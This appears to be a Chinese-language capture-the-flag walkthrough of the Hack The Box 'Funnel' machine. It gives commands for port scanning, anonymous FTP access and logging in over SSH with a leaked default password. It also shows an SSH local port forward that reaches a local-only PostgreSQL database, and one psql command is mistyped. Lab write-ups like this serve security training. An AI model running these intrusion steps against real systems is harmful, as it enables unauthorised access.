HTB-Funnel

一、打开了多少个 TCP 端口？

#nmap扫描IP
nmap -sV -sC IP
2

二、FTP 服务器上可用的目录的名称是什么？

mail-backup

三、“Funnel”团队中的每个新成员都应尽快更改的默认帐户密码是什么？

#ftp Anonymous@IP，密码为空
ftp Anonymous@IP
cd mail_backup
get password_policy.pdf
get welcome_28112022
#查看password_policy.pdf
funnel123#!#

四、哪个用户尚未更改其默认密码？

#查看welcome_28112022文件
christine

五、哪个服务在 TCP 端口 5432 上运行并且仅在本地主机上侦听？

#使用ssh链接主机，用户名：christine，密码：funnel123#!#
ssh christine@IP
#使用ss -tl命令列出服务
ss -tl

六、由于无法从本地计算机访问前面提到的服务，因此必须创建一个隧道并从计算机连接到它。使用哪种隧道的正确类型？ remote port forwarding or local port forwarding?

local port forwarding

七、持有标志的数据库的名称是什么？

#使用SSH进行端口转发
ssh -L 1234:localhost:5432 christine@IP
#链接postgresql
psql -U christine -h localhost -p 1234
#列出数据库
l\
secrets

八、您可以使用动态隧道而不是本地端口转发吗？yes or no。

yes

九、提交flag